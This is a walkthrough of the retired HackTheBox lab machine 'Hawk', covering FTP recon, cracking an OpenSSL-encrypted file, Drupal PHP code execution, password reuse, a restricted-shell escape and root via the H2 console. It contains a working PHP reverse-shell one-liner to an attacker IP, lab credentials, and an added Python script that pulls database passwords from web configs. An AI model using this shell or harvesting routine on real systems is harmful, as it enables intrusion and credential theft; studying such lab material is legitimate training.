Today the machine named “Hawk” from HackTheBox has been retired. It is a great box for learning a diverse set of attack techniques you may be unfamiliar with. In summary:

| User access | Root access |
|---|---|
| FTP service allows anonymous login | SSH tunneling to bypass the local-only access restriction |
| Identify and decrypt an OpenSSL-encrypted file | Abuse the H2 Database ALIAS feature to gain RCE as root |
| Drupal CMS upload of arbitrary PHP code (RCE) | |
| Password re-use on a local Linux account | |
Reconnaissance
As with every machine, start with an initial Nmap scan:
```
root@kali:~/HTB/hawk# nmap -sC -sV -oA hawk.htb 10.10.10.102
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 19:34 CET
Nmap scan report for 10.10.10.102
Host is up (0.037s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 messages
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.13
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA)
|   256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA)
|_  256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome to 192.168.56.103 | 192.168.56.103
8082/tcp open  http    H2 database http console
|_http-title: H2 Console
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.87 seconds
```
Important findings from the output:
- FTP (TCP/21) is open and allows anonymous login
- SSH (TCP/22) is open
- HTTP (TCP/80) is open, running the Drupal 7 CMS
- HTTP (TCP/8082) is open, running the H2 database console
Encoded file
Let’s first have a look at the FTP service. After logging in as the anonymous user, I can see a hidden file named `.drupal.txt.enc` in the “messages” folder.

```
root@kali:~/HTB/hawk# ftp 10.10.10.102
Connected to 10.10.10.102.
220 (vsFTPd 3.0.3)
Name (10.10.10.102:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Jun 16 22:14 .
drwxr-xr-x    3 ftp      ftp          4096 Jun 16 22:14 ..
drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 messages
226 Directory send OK.
ftp> cd messages
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 .
drwxr-xr-x    3 ftp      ftp          4096 Jun 16 22:14 ..
-rw-r--r--    1 ftp      ftp           240 Jun 16 22:21 .drupal.txt.enc
226 Directory send OK.
```
After transferring the file to my Kali box, I can see that its contents are base64-encoded.

```
root@kali:~/HTB/hawk# cat .drupal.txt.enc
U2FsdGVkX19rWSAG1JNpLTawAmzz/ckaN1oZFZewtIM+e84km3Csja3GADUg2jJb
CmSdwTtr/IIShvTbUd0yQxfe9OuoMxxfNIUN/YPHx+vVw/6eOD+Cc1ftaiNUEiQz
QUf9FyxmCb2fuFoOXGphAMo+Pkc2ChXgLsj4RfgX+P7DkFa8w1ZA9Yj7kR+tyZfy
t4M0qvmWvMhAj3fuuKCCeFoXpYBOacGvUHRGywb4YCk=
```
Let’s decode the contents, after which we are left with an OpenSSL-encrypted file (the `Salted__` prefix is the giveaway that `file` picks up on):

```
root@kali:~/HTB/hawk# base64 -d .drupal.txt.enc > drupal.txt
root@kali:~/HTB/hawk# cat drupal.txt
Salted__kY ԓi-6l7Z>{$p5 2[
8?sWj#T$3AG,f Z\ja>>G6
.EÐVV@ɗ4@wxZNiPtF`)
root@kali:~/HTB/hawk# file drupal.txt
drupal.txt: openssl enc'd data with salted password
```
The next step is to identify the cipher and password that were used to encrypt the contents. I used the openssl-bruteforce Python script (`brute.py`), which tries every cipher in a list against every password in a wordlist.

```
root@kali:~/HTB/hawk# python openssl-bruteforce/brute.py /usr/share/wordlists/rockyou.txt openssl-bruteforce/ciphers.txt drupal.txt
....
Password found with algorithm AES-256-CBC: friends
....
```
I can conclude that the file was encrypted with AES-256-CBC and the password `friends`. The same password decrypts it: `openssl aes-256-cbc -d -in drupal.txt -out result.txt -k friends`. We are finally able to see the contents of the encrypted file:
```
Daniel,
Following the password for the portal:
PencilKeyboardScanner123
Please let us know when the portal is ready.
Kind Regards,
IT department
```
Drupal CMS
I tried logging in as the user `daniel` on the Drupal web portal, but that didn’t work. Trying the obvious username `admin` with the password `PencilKeyboardScanner123` got me in.
Reverse Shell
The most obvious route would be to create a new article using PHP as the text format. However, out of the box the Drupal site only offers HTML text formats. Go to the Modules section and enable the “PHP filter” module.

Now we are able to create an article using the PHP code text format:

```php
<?php
echo exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 1337 >/tmp/f');
?>
```
Save the article and we get a shell back:

```
root@kali:~/HTB/hawk# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.102] 33016
/bin/sh: 0: can't access tty; job control turned off
$
```
Password
Now that we have a shell on the machine, let’s enumerate the system. One technique I commonly use is to check configuration files for credentials. Drupal uses a file named `settings.php`, which plays the same role as the `wp-config.php` file used by WordPress. This `settings.php` file is located in `/var/www/html/sites/default`. In it we can see the password for the MySQL database, `drupal4hawk`.

```php
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal4hawk',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
```
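The config-file check described above, as an added example that is not the writeup's own code: it walks a webroot for Drupal `settings.php` and WordPress `wp-config.php` files and extracts the database credentials (and whether the file is world-readable), so a defender can find secrets that may be reused elsewhere, as the MySQL password was on Hawk. The sample file contents and the temporary webroot are constructed.

```python
# Added example, not the writeup's code: pull plaintext DB credentials out of
# Drupal settings.php / WordPress wp-config.php files under a webroot, so a secret
# reused elsewhere (on Hawk, as daniel's SSH password) can be found and rotated.
# Sample file contents and paths are constructed.
import re
import tempfile
from pathlib import Path

# Drupal 7: 'key' => 'value' pairs in $databases; WordPress: define('DB_X', '...').
DRUPAL_RE = re.compile(r"'(database|username|password|host)'\s*=>\s*'([^']*)'")
WP_RE = re.compile(r"define\(\s*'(DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)'\s*,\s*'([^']*)'")
WP_KEYS = {"DB_NAME": "database", "DB_USER": "username",
           "DB_PASSWORD": "password", "DB_HOST": "host"}
CONFIG_KINDS = {"settings.php": "drupal", "wp-config.php": "wordpress"}

SAMPLE_DRUPAL = """$databases = array ('default' => array ('default' => array (
  'database' => 'drupal', 'username' => 'drupal', 'password' => 'drupal4hawk',
  'host' => 'localhost', 'driver' => 'mysql', 'prefix' => '', ), ), );"""
SAMPLE_WP = """define('DB_NAME', 'wp'); define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'wp-secret-1'); define('DB_HOST', 'localhost');"""

def parse_config(text, kind):
    """Return {database, username, password, host} parsed from config text."""
    if kind == "drupal":
        return dict(DRUPAL_RE.findall(text))
    return {WP_KEYS[k]: v for k, v in WP_RE.findall(text)}

def scan_webroot(root):
    """Walk root; report each known config file holding a non-empty DB password."""
    findings = []
    for path in Path(root).rglob("*"):
        kind = CONFIG_KINDS.get(path.name)
        if kind is None or not path.is_file():
            continue
        creds = parse_config(path.read_text(errors="replace"), kind)
        if creds.get("password"):
            # A world-readable config lets any local user or web shell lift the secret.
            creds.update(path=str(path), kind=kind,
                         world_readable=bool(path.stat().st_mode & 0o004))
            findings.append(creds)
    return findings

def demo():
    """Write the samples into a throwaway webroot and scan it (sorted by kind)."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "sites/default").mkdir(parents=True)
        Path(root, "sites/default/settings.php").write_text(SAMPLE_DRUPAL)
        Path(root, "wp-config.php").write_text(SAMPLE_WP)
        return sorted(scan_webroot(root), key=lambda f: f["kind"])
```

Run `demo()` to see both findings; on a real host point `scan_webroot` at `/var/www/html` and treat every hit as a password to rotate and to check against local user accounts.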
I could not find anything interesting inside the MySQL database. This was the part where I got really stuck: I just could not find a way to escalate from the `www-data` user. After trying many different things, I attempted to log in over SSH as the user `daniel` with the MySQL database password `drupal4hawk` I had found earlier. The login was surprisingly successful, but instead of a shell we are dropped into an interactive Python session. Use the Python `os` module to escape the restricted shell and read the `user.txt` file.

```
root@kali:~/HTB/hawk# ssh daniel@10.10.10.102
daniel@10.10.10.102's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Oct 28 23:42:16 UTC 2018

  System load:  0.02              Processes:           102
  Usage of /:   54.1% of 9.78GB   Users logged in:     0
  Memory usage: 44%               IP address for ens33: 10.10.10.102
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

55 packages can be updated.
3 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Oct 28 23:42:16 from 10.10.14.13
Python 3.6.5 (default, Apr  1 2018, 05:46:30)
[GCC 7.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system('/bin/bash')
daniel@hawk:~$ ls
user.txt
```
H2 Console
Even though I had a full interactive shell as the `daniel` user, I was unable to find a way to escalate to root. I took a step back and looked at the H2 database running on port 8082.

Something is blocking us from connecting to it remotely from our Kali machine: the console only accepts local connections. Let’s set up an SSH tunnel so we can reach the H2 console through the Hawk machine itself, which forwards local port 8888 to port 8082 on Hawk’s loopback interface:

```
ssh -L 8888:127.0.0.1:8082 -N -f -l daniel 10.10.10.102
```

Then browse to http://127.0.0.1:8888 and the H2 console interface appears:

Connect to the database using the credentials pre-filled in the interface. I then followed this blog post to exploit a vulnerability in the H2 Database ALIAS feature. Abusing this vulnerability allows arbitrary code execution as root. From here it is trivial to create a reverse shell payload using msfvenom; in my case, I just used it to view the contents of the root flag.